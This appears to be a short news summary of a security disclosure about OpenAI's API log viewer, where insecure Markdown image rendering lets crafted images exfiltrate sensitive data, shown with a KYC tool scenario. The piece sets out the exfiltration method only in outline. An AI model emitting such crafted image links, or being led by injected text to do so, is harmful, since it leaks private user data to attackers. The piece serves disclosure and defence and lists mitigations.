OpenAI API Logs: Unpatched data exfiltration (www.promptarmor.com)

OpenAI's API log viewer has been exposed as vulnerable to a data exfiltration attack, risking the privacy of applications built on its ‘responses’ and ‘conversations’ APIs. This issue arises from insecure Markdown image rendering in the API logs, allowing potentially sensitive data to be exfiltrated when developers access log conversations—even if they implement various defenses in their applications. Although the vulnerability was responsibly disclosed, OpenAI closed the report as 'not applicable' after several follow-ups, leaving users of the platform at risk. This situation is particularly significant for the AI/ML community because it highlights critical security vulnerabilities in widely used architectural elements associated with OpenAI's tools and APIs. Researchers demonstrated a scenario using a Know Your Customer (KYC) tool, where sensitive user data could be leaked via crafted Markdown images. Given that many vendors leverage OpenAI as a subprocessor, the repercussions of this vulnerability could be far-reaching. Developers are urged to adopt stronger measures, such as content security policies and better sanitization of outputs, to mitigate these risks as they continue to build robust AI solutions.